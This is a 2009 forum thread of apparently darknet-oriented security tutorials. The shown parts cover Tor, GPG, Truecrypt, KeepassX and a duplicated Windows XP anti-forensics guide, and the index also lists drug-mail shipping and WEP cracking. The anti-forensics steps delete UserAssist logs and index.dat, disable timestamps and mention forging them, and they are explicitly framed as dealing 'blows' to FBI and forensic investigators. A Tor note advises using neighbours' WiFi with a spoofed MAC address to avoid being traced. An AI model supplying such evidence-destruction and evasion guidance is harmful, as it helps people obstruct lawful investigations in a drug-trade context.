Massive tutorial collection

binary shadow · Apr 1, 2009

Some of these I posted a long time ago and others are new. Sorry if I am double posting them but here is a thread with some nice tutorials in it on how to secure your communications and other things related to internet sourcing. Here is the index each tutorial I will give a separate post. Again sorry for double posting.

Index

Setting up Tor Anonymity Network for Windows XP
Disable the built in forensic features of Windows XP
Setting up and using GPG encryption for windows
Setting up truecrypt encrypted file containers with Ubuntu Linux
Setting up and using GPG encryption with Ubuntu Linux
Using Keepass Password Safes for Ubuntu Linux
Configuring Ironkey Military Grade Security USB
Setting up encrypted anonymous instant messages for windows
Safely shipping drug mail for sender and recipient
Truecrypt Container + Hard Drive encryption for Windows XP
Anti Forensic Hard Drive Wipes for most computer systems
Basic review on payment system (this is fairly accurate but I would have wrote it differently)
Cracking WEP WiFi encryption (for anonymity!)

binary shadow · Apr 1, 2009

Tor...

Tor

(NOTE: Tor offers a very high degree of anonymity online when used correct. It is not a magic shield though. For the majority of people, you are not worth the tens of thousands of dollars, dozens of hours of paper work and attempts at international legal cooperation that would be required to trace you down. Some people it might be worth that to track you down, and it is not impossible to be tracked down over the tor network, it is only very expensive and time consuming. It is next to impossible in some cases, but a lot depends on your node path and it would be naive to think that you can't eventually be tracked down. For people that still don't feel safe knowing it will cost tens of thousands of dollars and take days of paper work and headaches for them to be traced down, I suggest you use Tor in addition to public WiFi. Long range antennas are cheap and you can probably get five or six signals from your house. If not you can go to coffee shops etc and use their wifi, a lot of places have free wifi these days that you don't need accounts for. Spoof your mac address, use public wifi and Tor and you will literally be a shadow on the internet. Even by the time the manage to trace your location back using Tor, you will be long gone if you go to coffee shops to use their Wifi and only a forged Mac address with no connection to you will be left. Even if you use a neighbors Wifi signal, they will first need to track you down over the Tor network and then they will need to bust out directional wifi sniffers and triangulate you back to your position, and chances are you will get suspicious when you see a bunch of people outside walking around with laptops and big ass antennas and can simply disconnect lol.)

What it is

Tor is an onion router that allows for a high level of anonymity on the internet. It works by creating a three node long chain between your computer and the machines you communicate with. You send information encrypted with layers down the node circuit and the information leaves from an exit node to the final destination. This makes it greatly more difficult for you to be tracked down over the internet. You should keep in mind that using Tor incorrectly can damage your security even though it may help your anonymity. You should only use Tor in combination with SSL or other sorts of encryption, as the last layer of Tor applied encryption is stripped off at the exit node and a malicious exit could eavesdrop on your information unless it is encrypted using other methods (https:// websites, etc)

Things to keep in mind

1. When using Tor, you should make heavy use of SSL (https://) because if you are not connected to a service over SSL the exit node in your Tor circuit can sniff your information.

2. You should disable Java, Javascript, Flash and ActiveX in your browser when using Tor, as these services can circumvent Tor to entirely remove all of your anonymity.

3. You should expect Tor to go very slow. You can switch identities and hope for a faster one, but in general they are all slow. I suggest you use one browser with Tor and one with out Tor and use the Tor browser for sketchy things only.

What you need to get

There are a few different ways that Tor can be set up and for that reason there are several suggested packages you can get. This tutorial will focus on each of the main ways Tor can be set up, and will also talk about how to set up various program to make use of Tor. Depending on the method you use with Tor, you will need one of the following programs

All packages can be found at the following location

www.torproject.org/download.html.en

Stand alone Tor

This is for if you want the most control over Tor and plan to run more than your browser and IM client through Tor. It is the hardest to set up but offers by far the most control to the user. This is the first set of links in the above mentioned download page. You can get either the stable version, which is tested and bug free + stable, or you can get the alpha version which may have more features and be more secure but also may be less secure and more buggy.

Tor Browser bundle / IM Browser bundle

This allows for quick and painless set up of Tor with Firefox and Pidgin, but it does not allow for maximum control. Also it forces you to use the Alpha version of Tor, and it uses Polipo as the default anonymizer and although it is still very good, it allows more information about you to leak out than Privoxy does (although your actual IP address will stay safe). Polipo is faster than privoxy however. This is the suggested set up if you don't have the time to learn how to set up Tor for yourself, or don't have the motivation to do so. It is by far better than using nothing, but it is not quite as good as using stand alone Tor and configuring it yourself to meet your needs.

If you choose to go with the Browser Bundle, simply install it to a folder and then when you desire to use Tor and firefox, launch firefox using the Tor button in that folder. A Firefox and Pidgin session will start up and both will be preconfigured to send traffic through the Tor network.

If you decide to go with the stand alone version of Tor, select one of the following tutorials to walk you through setting it up.

Torrify stand alone programs

Browsers

Konqueror: Settings -> Configure Konqueror -> Proxy -> Manually Specify the proxy settings -> Setup

Opera: Open Tools -> Preferences -> Advanced -> Network -> Proxy Servers

Firefox: Tools -> Options -> General -> Connection Settings -> Manual proxy configuration

Set HTTP, SSL (HTTPS://) , FTP, Gopher, WAIS to all be 127.0.0.1 on port 8118

FTP will not work correctly, but unless it is set to go through Tor it will leak information to ftp servers so you should keep this setting.

For later versions of firefox you should add the following line to about:config to force remote domain name lookups:

network.proxy.socks_remote_dns user set boolean true

In firefox you can get foxyproxy to switch Tor on and off at will, or set it to only work with certain websites. This can come in handy, but it can also cause some leaks in your anonymity. I suggest you use two different browsers, one with tor and one with out, instead.

In Opera you can use the Proxy button from the button wiki as a foxyproxy replacement (button can be found here: www.operawiki.info/CustomButtons also worth getting some of the other buttons like disable javascript, disable ref log, etc)

Other Programs

Pidgin: Preferences -> Network -> Proxy server

Proxy type: SOCKS 5
Host: 127.0.0.1
Port: 9050

Advanced tip

You can set a fourth self selected node in your Tor chain that all traffic from Tor is routed through. This has a few advantages. For one, is allows you to have more knowledge about your exit node and decreases the chances the feds can get a full circuit. For two it increases the length of your circuit by an additional node. For three, it gives you a consistent exit node which can hide the fact that you are using Tor. It will slightly decrease your speed however, and unless you use a free open proxy (which wont be near as helpful) you will need to find some way to ANONYMOUSLY purchase a proxy server.

If you have an anonymous proxy server though, you can chain it at the end of your tor circuit using privoxy by adding these two lines to the privoxy config file:

forward-socks4a / localhost:9050 .
forward-socks4a *.wikipedia.org localhost:9050 0.0.0.0:80

where 0.0.0.0:80 is replaced with the IP and port of the proxy you choose to use, and *.wikipedia.org is replaced with the websites or services you want this additional proxy to be used in the circuit for.
Click to expand...

binary shadow · Apr 1, 2009

Disable windows XP anti forensics

What it is

It is a few techniques to disable the built in forensic aiding programs that come bundled with windows XP. These so called features offer little service to the user, but offer a wealth of information to any investigating forensics team.

What you need to get

Nothing

Disable Userassist

Userassist is a program on windows XP that logs the date and time you launch certain programs. It is used to generate your recently used programs list, so disabling this will disable that. It is mostly used by forensic teams to build a digital time line.

1. Go to the run box and type in regedit to go to your registry editor.

2. Using the side tabs, go to currentuser\software\microsoft\windows\currentversion\explorer\userassist

3. There are two subkeys under Userassist, they have long names that look like serial numbers. Under each of these subkeys is a key called Count. Delete both of the Count keys.

4. Add a new subkey called “Settings” under the Userassist key, to do this use the right mouse button under the Userassist key and select new>key.

5. Add the DWORD value “NoLog” in the settings subkey. To do this, select the settings subkey and then in the blank screen to the right of the side tabs, right click. Select the new DWORD option, and name the DWORD “NoLog”

6. Change the setting of the “NoLog” DWORD value to “1”

7. You have now disabled UserAssist, and dealt a major blow to any forensic team that will scrutinize your system.

Set up an unfirendly enviornment for forensics

Now we are going to make a few modifications to the way windows operates, in order to have a better foundation for security.

Disable System Restore Points

System restore points are to restore the system to an earlier date in case you mess up drivers or something. Some people use them, most never do. They take up a lot of room, and open a lot of doors to forensics teams. They can compare your system at different points in time and can use this to help build a time frame. System restore also comes in handy for virus writers, even if you remove a virus it will be hiding out in your system restore files just waiting.

To disable System Restore points, simply right click on My Computer and go to Properties, then click on the system restore tab. From here, check the disable box.

Turn Off Hibernation Mode

Hibernation mode is used to save resources by setting the PC to a low power state after it is not in use for a period of time. This is dangerous to certain types of encryption that store the key in ram, as there is a significant chance that the private key will be written plain text to the drive from ram as the machine switches to hibernation mode. This key can then be extracted by a skilled computer forensics team.

To disable this, go to the control panel and, under classical view I believe, select power options. Go to the hibernate tab and ensure that the box next to hibernate is not checked.

Ensure that Auto Standby is Not Enabled

Auto stand by (and ever going into stand by when you have encrypted volumes mounted) poses the same risks as hibernation mode. It is best to turn the ability off completely.

To disable auto standby, click on control panel and go to power options. Go to the power schemes tab and ensure that system stand by is set to never. Also ensure that turn off hard discs is set to never.

Remove the Option to Standby From the Shutdown Menu

This removes the ability to manually stand by. Auto standby is already disabled but you can manually over run that. It is better to turn it off all the way to make sure no mistakes happen. One person who tried this had trouble with it for some reason, not sure why, it works perfectly fine for me.

To do this, create a new text document and name it disable stand by. Rename the files extension to .reg (you will need extensions visible in order to do this, don't make it .reg.txt with a hidden .txt really make it .reg). Now, open the reg file with notepad and add the following text to it:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ACPI\Parameters]
"AMLIMaxCTObjs"=hex:04,00,00,00
"Attributes"=dword:00000070
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ACPI\Parameters\WakeUp]
"FixedEventMask"=hex:20,05
"FixedEventStatus"=hex:00,84
"GenericEventMask"=hex:18,50,00,10
"GenericEventStatus"=hex:10,00,ff,00
Click to expand...

Save the file. Now, double click on the file and agree to add the information to your registry.

Disable the Memory Dump

The memory dump is a section of the hard drive RAM will write out to if it is ever full. Most modern computers have enough Ram to not need to worry about this. If a plain text passphrase is in ram and gets written out to the drive, it can be retrieved by skilled computer forensic teams. It is best to disable this in all modern computers.

To do this, right click on My Computer, then go to properties and click on the advanced tab. Under start up and recovery, go to settings. under “Write debugging information” change the drop down bar to “none”.

disable index.dat

This is possibly one of the biggest forensic tools in windows and it is hard to remove (Surely made that way on purpose). It logs pretty much every search you make from internet explorer and tons of other information on what you do. It is impossible to delete unless you enter safe mode. It is frequently used by forensic teams to build cases against people. It also takes up increasingly more and more space the longer you run your computer it never deletes the logs so between formats ALL your searches from day one are stored on your computer, and after a while that will be hundreds of megs of wasted drive space.

To remove this "feature", reboot your computer in safe mode and login as administrator. Launch a command prompt and type in CD\ and then hit enter. Now type in del index.dat /s and hit enter. You have now removed your index.dat file forever, dealing another great blow to forensics teams.

Disable the last accessed timestamp

The four windows timestamps are used by forensic teams to create digital time lines. Encase is a popular program used by the FBI to do this. You can use the anti forensic program Timestomp to modify and forge all four timestamps. That is a bit advanced though. I do however suggest everyone disables last accessed time stamps. This can fuck up some back up software that relies on timestamps, and it does serve some role in operating system features (it has some legit uses that is, not just forensic ones). But I still suggest it is disabled.

To do this, open a command prompt and type in the following command: fsutil behavior set disablelastaccess 1

Good job your windows operation system has been hardened again many forensic attacks and also has had weaknesses inherent to digital encryption neutralized. For novice users who want even more hardening of their operation systems I suggest the free and open source software program "XP anti-spy". It will harden the OS against several other weakness that are exploited by forensic teams and spyware makers. Also it is always a good idea to run an anti-virus, anti-keylogger, anti-spyware, firewall and it is also a good idea to immunize your system against particularly nasty spyware using "Spyware blaster".
Click to expand...

binary shadow · Apr 1, 2009

Disable XP forensics

What it is

It is a few techniques to disable the built in forensic aiding programs that come bundled with windows XP. These so called features offer little service to the user, but offer a wealth of information to any investigating forensics team.

What you need to get

Nothing

Disable Userassist

Userassist is a program on windows XP that logs the date and time you launch certain programs. It is used to generate your recently used programs list, so disabling this will disable that. It is mostly used by forensic teams to build a digital time line.

1. Go to the run box and type in regedit to go to your registry editor.

2. Using the side tabs, go to currentuser\software\microsoft\windows\currentversion\explorer\userassist

3. There are two subkeys under Userassist, they have long names that look like serial numbers. Under each of these subkeys is a key called Count. Delete both of the Count keys.

4. Add a new subkey called “Settings” under the Userassist key, to do this use the right mouse button under the Userassist key and select new>key.

5. Add the DWORD value “NoLog” in the settings subkey. To do this, select the settings subkey and then in the blank screen to the right of the side tabs, right click. Select the new DWORD option, and name the DWORD “NoLog”

6. Change the setting of the “NoLog” DWORD value to “1”

7. You have now disabled UserAssist, and dealt a major blow to any forensic team that will scrutinize your system.

Set up an unfirendly enviornment for forensics

Now we are going to make a few modifications to the way windows operates, in order to have a better foundation for security.

Disable System Restore Points

System restore points are to restore the system to an earlier date in case you mess up drivers or something. Some people use them, most never do. They take up a lot of room, and open a lot of doors to forensics teams. They can compare your system at different points in time and can use this to help build a time frame. System restore also comes in handy for virus writers, even if you remove a virus it will be hiding out in your system restore files just waiting.

To disable System Restore points, simply right click on My Computer and go to Properties, then click on the system restore tab. From here, check the disable box.

Turn Off Hibernation Mode

Hibernation mode is used to save resources by setting the PC to a low power state after it is not in use for a period of time. This is dangerous to certain types of encryption that store the key in ram, as there is a significant chance that the private key will be written plain text to the drive from ram as the machine switches to hibernation mode. This key can then be extracted by a skilled computer forensics team.

To disable this, go to the control panel and, under classical view I believe, select power options. Go to the hibernate tab and ensure that the box next to hibernate is not checked.

Ensure that Auto Standby is Not Enabled

Auto stand by (and ever going into stand by when you have encrypted volumes mounted) poses the same risks as hibernation mode. It is best to turn the ability off completely.

To disable auto standby, click on control panel and go to power options. Go to the power schemes tab and ensure that system stand by is set to never. Also ensure that turn off hard discs is set to never.

Remove the Option to Standby From the Shutdown Menu

This removes the ability to manually stand by. Auto standby is already disabled but you can manually over run that. It is better to turn it off all the way to make sure no mistakes happen. One person who tried this had trouble with it for some reason, not sure why, it works perfectly fine for me.

To do this, create a new text document and name it disable stand by. Rename the files extension to .reg (you will need extensions visible in order to do this, don't make it .reg.txt with a hidden .txt really make it .reg). Now, open the reg file with notepad and add the following text to it:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ACPI\Parameters]
"AMLIMaxCTObjs"=hex:04,00,00,00
"Attributes"=dword:00000070
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ACPI\Parameters\WakeUp]
"FixedEventMask"=hex:20,05
"FixedEventStatus"=hex:00,84
"GenericEventMask"=hex:18,50,00,10
"GenericEventStatus"=hex:10,00,ff,00
Click to expand...

Save the file. Now, double click on the file and agree to add the information to your registry.

Disable the Memory Dump

The memory dump is a section of the hard drive RAM will write out to if it is ever full. Most modern computers have enough Ram to not need to worry about this. If a plain text passphrase is in ram and gets written out to the drive, it can be retrieved by skilled computer forensic teams. It is best to disable this in all modern computers.

To do this, right click on My Computer, then go to properties and click on the advanced tab. Under start up and recovery, go to settings. under “Write debugging information” change the drop down bar to “none”.

disable index.dat

This is possibly one of the biggest forensic tools in windows and it is hard to remove (Surely made that way on purpose). It logs pretty much every search you make from internet explorer and tons of other information on what you do. It is impossible to delete unless you enter safe mode. It is frequently used by forensic teams to build cases against people. It also takes up increasingly more and more space the longer you run your computer it never deletes the logs so between formats ALL your searches from day one are stored on your computer, and after a while that will be hundreds of megs of wasted drive space.

To remove this "feature", reboot your computer in safe mode and login as administrator. Launch a command prompt and type in CD\ and then hit enter. Now type in del index.dat /s and hit enter. You have now removed your index.dat file forever, dealing another great blow to forensics teams.

Disable the last accessed timestamp

The four windows timestamps are used by forensic teams to create digital time lines. Encase is a popular program used by the FBI to do this. You can use the anti forensic program Timestomp to modify and forge all four timestamps. That is a bit advanced though. I do however suggest everyone disables last accessed time stamps. This can fuck up some back up software that relies on timestamps, and it does serve some role in operating system features (it has some legit uses that is, not just forensic ones). But I still suggest it is disabled.

To do this, open a command prompt and type in the following command: fsutil behavior set disablelastaccess 1

Good job your windows operation system has been hardened again many forensic attacks and also has had weaknesses inherent to digital encryption neutralized. For novice users who want even more hardening of their operation systems I suggest the free and open source software program "XP anti-spy". It will harden the OS against several other weakness that are exploited by forensic teams and spyware makers. Also it is always a good idea to run an anti-virus, anti-keylogger, anti-spyware, firewall and it is also a good idea to immunize your system against particularly nasty spyware using "Spyware blaster".
Click to expand...

binary shadow · Apr 1, 2009

GPG for windows...

GPG for windows

What it is

GPG is a free and open source public key encryption program. It allows you to communicate with other people in an extremely secure fashion. The basic concept is, you generate a pair of keys one which is publicly distributed and one of which is kept private. The private key is encrypted with very strong AES-256 (by default, there are other options if you get advanced with it but aes-256 is perfectly fine and you shouldn't mess with the defaults if you don't know what you are doing) and requires a passphrase to decrypt for use. The publicly distributed key acts as a sort of 'open lock', a person puts information in a 'container' (Ascii armor) and then closes the lock around it. They then send the container to you, and after using your passphrase to access your private key, you can open the container and get the information out. GPG can also be used to create secure signatures on information, which can be used to authenticate information from an individual as actually coming from them.

What you need to get

You will need to get the windows GPG program which can be found at the following location www.gpg4win.org

Install it

All you need to check mark during installation is GnuPG and WinPT. The other plugins are not that interesting.

Getting started

1. The first thing you need to do is generate a keypair. It makes you generate a normal keypair when you first run the program for some reason. Just bullshit the information on this one and then delete it, we want to create an expert key.

2. After creating and deleting the first key, now it is time to make the expert key. In WinPT (the icon of a silver key with the @ sign as its top half) and from the top bar, go to "Key --> New ---> Expert"

3. Leave key type as "DSA and ELG"

4. Set the subkey size as 4096. If your computer freezes when generating the key, you may have to lower this to 2048 but you should always try to go as high as possible. You should avoid keys lower than 2048 bits at all costs.

5. Where it asks for your real name, put the user name that you use. Do not put your real name as it will be visible to anyone who looks at your public key.

6. Add a comment if desired, keeping in mind anyone who looks at the public key can see the comment. You can either put a real E-mail address or a fake one, but remember anyone who looks at your public key can see the E-mail address you put. Also you should probably leave it as a never expired key. After filling out all needed information, hit start.

7. You will be asked to enter a passphrase. Your passphrase should be long and random. I suggest it is at least like 40 characters long.

8. Your key pair is now created, it should show up in the winpt keyring as having two little keys next to it. This means that you possess both the public and the private key

9. Click on the private/public key icon with the right mouse button. Select copy key to clipboard. It will put your public key on the clipboard, which means that you can paste it.

10. Paste your public key where ever you want to. Send it to people you want to be able to talk with securely, or want to be able to authenticate your identity to at a later point in time. Post the public key where ever you want, it does not matter who gets it.

Encrypting signed messages to people

(Note: Keep in mind you encrypt to the other persons public key, not to your own keys!)

1. To send someone an encrypted message, the first thing you will need is their public key. After getting their public key, paste it into a .txt document and save it. In WinPT, go to "Key ---> Import" and select the .txt file you saved the key to. WinPT will automatically import that key. Feel free to delete the text file at this time.

2. The persons public key will now show up in your key ring. It will have one blue key next to it. This means that you only have the public key.

3. Now that you have the persons public key, you can write them encrypted messages. First write the message you wish to send the person in a program like notepad.

4. Once you have finished typing the text, copy it to the clipboard.

5. In the system tray (the little icons next to the clock) right click on the winpt icon. Winpt needs to be active for the icon to be there, so make sure you are running it.

6. In the menu that pops up, go to "Clipboard ---> Sign and Encrypt"

7. A message will pop up showing your key ring. First select the key you wish to encrypt the message with by putting a check mark next to the key of the person you are sending the message to. If you wish to send the same message to several people, you can encrypt it to multiple keys by checking several boxes.

8. Now, sign the message. To do this, put a check mark in the "Select key for signing" box, and from the drop down menu, select your private key. This is so the person can verify that you are indeed the person they think you are and not someone pretending to be.

9. A message will appear on your screen telling you that the message is being encrypted. Wait a few seconds for this to finish.

10. Your encrypted message is now in your clipboard, instead of the unencrypted version you had their previously. To get the encrypted message, simply paste it into a text program, or an email, or whatever. Now, send the message to the person whose public key you used to encrypt it.

Decrypting messages from other people

(Keep in mind people need your public key to be able to send you encrypted messages!)

1. To decrypt a message someone has sent you, take the full block of encrypted text and copy it into the clipboard. To do this, just select all the text and copy it. You need to include the entire message, from and including the first "-" all the way to and including the last "-".

2. Now that the message is in your clipboard, go to the winPT icon in your system tray, which is by the clock. Right click on the icon and go to "Clipboard ---> Decrypt/verify".

3. It will automatically detect which private key is needed to decrypt this message, and will give an error if you do not have the private key.

4. It will ask you to type in your passphrase, which you should do.

5. A message box will pop up with some information about the message. If the message was signed by the sender, it will check to make sure that the person who sent you the message is who you think it is.

6. After you close the message box, the decrypted message should be in your clipboard. To view it, simply open a text editor and paste the message.

Signatures / identity verification

1. Messages can be signed even if they are not encrypted. This can come in handy in a few situations. For example, someone makes a promise to you and you are worried they might back out of it and want to have proof that they made the promise to show others if they happen to back out. You could request that they sign their promise with their private key, and then anyone who has their public key can verify that they signed the promise in the future. Another situation in which signing can come in handy is identity verification.

2. First, copy the message you want to sign to your clipboard.

3. Right click on the WinPT icon in the system tray and go to "Clipboard ---> Sign"

4. It will ask you to type in your passphrase, so do that.

5. Now the signed message is in your clipboard and you can paste it where ever you want. Anyone with your public key can now authenticate that you wrote the message, and they can also verify your identity to a good extent (the signer of the message is either you, or someone who somehow managed to get the passphrase for your private key). Keep in mind if you try and edit the message you wrote after signing it, the signature will break. You must edit the message and resign it if you wish to edit it at all.
Click to expand...

binary shadow · Apr 1, 2009

Truecrypt for ubuntu

1. The first thing you will be required to do in order to set up Truecrypt is get the .deb file. This file can be located at the following
location: www.truecrypt.org/downloads.php

2. Ensure that you select the correct version for your processor. For example, if your processor is set to 64 bits, get the 64 bit
version of the program.

3. After you have the .deb file and launch it, you will be presented with a package installer that will give you a brief run down of
what the program is. Press the “Install Package” button.

4. Truecrypt will proceed to install. After it is done installing, it can be run by typing Truecrypt in the terminal. To create an icon
for Truecrypt, right click on the desktop and select “Create Launcher” from the drop down list. Set the name and command
fields to both equal truecrypt. Now when you click on this icon, Truecrypt will launch.

5. Now that Truecrypt is installed, it is time to put it to use. First you will be required to make a new volume. This tutorial assumes
you are going to be creating a shell file for your encrypted volume, although the instructions for encrypting a partition are very
similar.

6. Click on Volumes and from the drop down list select Create New Volume. You will be presented with a new interface asking
you if you want to create a standard or a hidden volume. Unfortunately, hidden volumes are not currently supported under this
version of Ubuntu, so you must select to create a standard volume.

7. After selecting to create a standard volume, move your mouse around randomly with in the window for several minutes before
clicking next. This is to gather random data to see the encryption algorithm, significantly enhancing its security levels.

8. After several minutes of randomly moving your mouse, click next.

9. Since we are going to be creating a shell file, click the select file button. Find the location you want the shell file to be stored,
and then type in the name you want the shell file to be called and select save.

10. Input the size you wish the hidden volume to be, and then select next.

11. Select the encryption algorithm and hash algorithm you wish to use. The most secure combination is probably AES*Twofish*
Serpent for the encryption algorithm and Whirlpool for the hash algorithm. It should be noted that the disk speed will be
significantly slowed down when launching applications from this encrypted file shell, because not only does Ubuntu have to
decrypt the information (assuming you are using full disk encryption) but Truecrypt also has to decrypt the information. With a
modern computer the slow down should be very negligible, but if you are using an older computer you may desire to select a
different combination for the encryption algorithm.

12. Select next after selecting your algorithm combo. You will be taken to a new screen and prompted to enter a passphrase. This
Passphrase should be very secure, it is probably best to generate a passphrase with KeepassX and input that passphrase. You
will also be given the option to use a Key File. If you do decide to use a Key File, ensure that you have a back up copy.

13. After selecting next you will be taken to a new screen and asked what filesystem you would like this volume to be. FAT is the
standard file system you should select.

14. Click on next and you will be taken to a new screen. Move your mouse about randomly in this window for at least ten minutes.
You should also uncheck the Show option.

15. After you have moved your mouse around for a sufficient period of time, select format. Your Truecrypt volume will begin
formatting. Depending on the size of the volume, this could take a significant amount of time.

16. After your volume is finished formatting, to mount it, go to the main Truecrypt window. Click the select file option, and from
there select the file shell you just created. Hit the mount button, and you will be prompted for your passphrase and Key File
(assuming you prompted to use a Key File). Enter your passphrase and give the path to your keyfile, and your volume will be
mounted. You can use a mounted volume just as if it was a regular partition. You should make sure to unmount a volume when
it is not in use.
Click to expand...

binary shadow · Apr 1, 2009

GPG for Ubuntu

1. First you must install GPG. To do this, run terminal and type in “Sudo apt*-get install gnupg” and follow through with any
prompting you may get.

2. Next, you should install a GUI for GPG. To install a popular GUI, go to terminal and type in “Sudo apt*get install kgpg” and
follow through with any prompting you may get.

3. An icon for KGPG will be present under Applications>Accessories, to launch KGPG you should click on this icon.

4. The first thing you must do is generate a set of keys. To do this, click on the keys tab on the drop down bar, and from the drop
down menu select Generate Key Pair. A new interface will pop up.

5. The new interface will ask you for details so that it can generate your key pair. It will ask you for your name and e*mail address
for example. For name you should put your screen name, you can either leave e*mail blank, put your real e*mail address, or use a
fake e*mail address. It should be noted that the name and e*mail address you use will be visible to anyone you send your public
key to. It will also ask you for a comment, which you can leave blank if you wish, or you can put a comment in if you have a
reason to do so.

6. Next you must decide if your key will expire, and if so when. Usually a key does not need an expiration date, although if you
feel the need to put one you can do so. After an expiration date passes, your key will no longer function, and you will be
required to generate a new pair.

7. Now you must select a key size. As a rule of thumb, the larger the key size the more secure messages encrypted with the key are
going to be. You should select 4096 as your key size.

8. Now you must select an algorithm. The default algorithm, DSA & ElGamal, should be selected.

9. After filling out the appropriate fields, click the ok button. You will be taken to a new interface and asked to supply a
passphrase. The passphrase should be very long and random, your best bet is to use KeepassX to generate a passphrase.

10. After you enter your passphrase twice, click on the generate button. A window will pop up explaining that a new key pair is
being generated. During the generation of the key pair, you should move your mouse about randomly in order to create a large
amount of entropy, thus making your key pair more secure. Continue to move your mouse until the generating key pair window
closes.

11. After your key pair has generated, the window will close.

12. Now your keyring has one set of keys in it (your private key and your public key). You need to send your public key to all those
you wish to communicate with, so that they can encrypt information before sending it to you. To do this, right click on the key
pair you just generated, and select export public keys. A new window will pop up asking you where you would like to export the
public key to. You should select clipboard. Your public key will now be stored on your clipboard (meaning it is what will paste
when you go to paste something.)

13. You can send your public key to others via forums, key servers, e*mails, etc. simply by pasting the key where you would like it
to appear. Now others can use your public key to send encrypted information to you.

14. After someone sends you encrypted information, copy the information to your clipboard. Now go to KGPG and select
File>Open Editor. A new window will pop up that allows you to input text into it. Paste the encrypted information into this
window and select decrypt. You will be prompted for your passphrase. After correctly entering your passphrase, the information
will decrypt and you will be able to read it.

15. To send other individuals encrypted information with GPG, you need to upload their key to your keyring. To do this, copy their
public key to your clipboard. Now, go to KGPG and go to Keys>Import Keys. A new window will pop up and ask from where
you want to import the new key. Select clipboard and then click ok. The persons public key will be added to your keyring.

16. Now that you have the public key of the individual you wish to send encrypted information to, go to File>Open editor. A new
window will pop up that allows you to input text into it. Type the message you wish to send to the individual in this window, and
then click on the Encrypt button. A new window will pop up asking which key you want to use to encrypt the information. If
you have not set the individuals public key to trusted, you will need to click on the options button and put a check mark next to
“Allow encryption with untrusted keys”. Now simply click on the key of the person the message is intended for, and select ok.
Your message is now encrypted. To send the message to the individual, simply copy and paste the encrypted block of text to
your clipboard, and e*mail it to them, or send it to them in a private message, or whatever.

17. You can also sign your encrypted message, so that the individual knows that it is in fact coming from you (or someone who has
access to your private key and passphrase...which should be only you). To sign your encrypted message, click the sign/verify
button and select your private key. You will be prompted to enter your passphrase, and after correctly entering your passphrase a
signature will be attached to your message.

18. If you have someone public key, you can verify signed messages they send to you. To do this, simply paste their signed message
into the editor, and click on the sign/verify button. A window will pop up telling you if the signature is valid or not. After you
verify the signature, remove the signature from the editor. You will also need to remove one extra “*” at the top and bottom of
the message, so that “*****BEGIN PGP MESSAGE*****” is the first line and “*****END PGP MESSAGE*****” is the last line.
After doing this, simply click the decrypt key and enter your passphrase after you are prompted to do so.
Click to expand...

binary shadow · Apr 1, 2009

Keepass for Ubuntu

1. The first thing you will be required to do in order to set up KeepassX is download the .deb file. This file can be found here:
http://www.keepassx.org/downloads . Ensure that you select the right installation based on your processor (For example, if you
have your processor set up as 64 bit, make sure to download the 64 bit version of the program.)

2. After you have saved and launched the .deb file, you will be presented with a package installer. It will tell you some basic
information about the package, as well as have a button labeled “Install Package”. Click on this button, and KeepassX will be
installed.

3. A KeepassX icon will now be located under Applications>Accesories. Launch this icon.

4. Upon clicking this icon, an interface will launch asking you to enter your password. As you have not made a KeepassX database
yet, click cancel.

5. After clicking cancel you will be brought to a new interface. The first thing you want to do is set up a KeepassX database. To do
this, click on File>New Database.

6. After clicking on New Database, an interface will come up asking you to enter a passphrase two times. Keep in mind that
although this passphrase is going to guard all your other passwords, you must be able to remember this passphrase or you will
not be able to access your other passphrases. Regardless, your strongest password stored in your KeepassX database is only as
strong as your KeepassX passphrase, so you should choose a passphrase that is very long, random and makes use of upper and
lower case letters, numbers and special characters. Just make sure you can memorize it, writing it down on a piece of paper or
some such thing is unacceptable for a good security scheme.
You also have the option of using a Key File in addition to a Passphrase. A Key File is a special file that is required to open a
database. Key Files can be stored on a computer, or they can be stored on a USB drive, Floppy disk, ETC. If you choose to make
use of a Key File, remember that with out that Key File you will not be able to access your database, regardless of if you
remember the passphrase or not.

7. After you enter your passphrase and select (or don't select) a Key File, the interface will close and take you back to the last
interface. Now you need to add information to your KeepassX database. You will need to add a new group in order to do this.

8. To create a new group, right click the white area under the header “groups” and select from the drop down menu Add New
Group. A box will pop up asking you what name you would like to assign this group. Enter the name you desire and then click
ok.

9. Now that you have a database set up with a group in it, you can start adding entries. To do this, make sure the group you want to
add the entry to is selected, and then right click the white space next to the white space under the header Groups. Select Add
New Entry from the drop down list.

10. After you select Add New Entry a new interface will pop up asking you for information on the entry. Fill out the appropriate
fields with the information you want stored. You can either enter a passphrase you have come up with yourself, or better yet, you
can have KeepassX generate a passphrase for you. To do this, click on the button labeled Gen. Which is located next to the
password repeat field.

11. After clicking this button, you will be taken to a new interface which will help you generate your passphrase. It should be noted
that although the options for such things as underlined letters exist, not all things you enter a passphrase into will recognize
more than upper / lower case letters, spaces, numbers, minus and special characters. For this reason it is suggested you only
select these options, unless you know for certain that other characters will be recognized.

12. You are given the option to set the length of the passphrase. Considering you are not going to be required to remember this
passphrase (that is what KeepassX is for, after all), it is better to set the length of the passphrase to be high.

13. After you are done adding all of your entries, save the database to whatever location you desire. You should save the database
with the extension .kdb so that it is recognized by KeepassX.

14. To access the database in the future, simple load KeepassX, select the database from its location, and enter the passphrase (and
give the path to the Key File if you opted to use one).

15. It should be noted that it is a good idea to have a backup copy of your database and Key File stored off your main system, incase
something goes wrong. If your Keepass database is accidentally erased or corrupted there is an extremely slim chance of being
able to recover it, and thus an extremely high chance you have lost all passphrases contained in it.
Click to expand...

binary shadow · Apr 1, 2009

Ironkey (credit to author who wishes anonymity I think)

What is the 'IronKey'?

You can read all about the ironkey on it's website (hxxps://www.ironkey.com/personal). It has many advantages over a standard USB stick with truecrypt installed.
Click to expand...

---

ToR

Download PortableTor from here (hxxp://portabletor.sourceforge.net/) and install it on your IronKey
Click to expand...

Internet

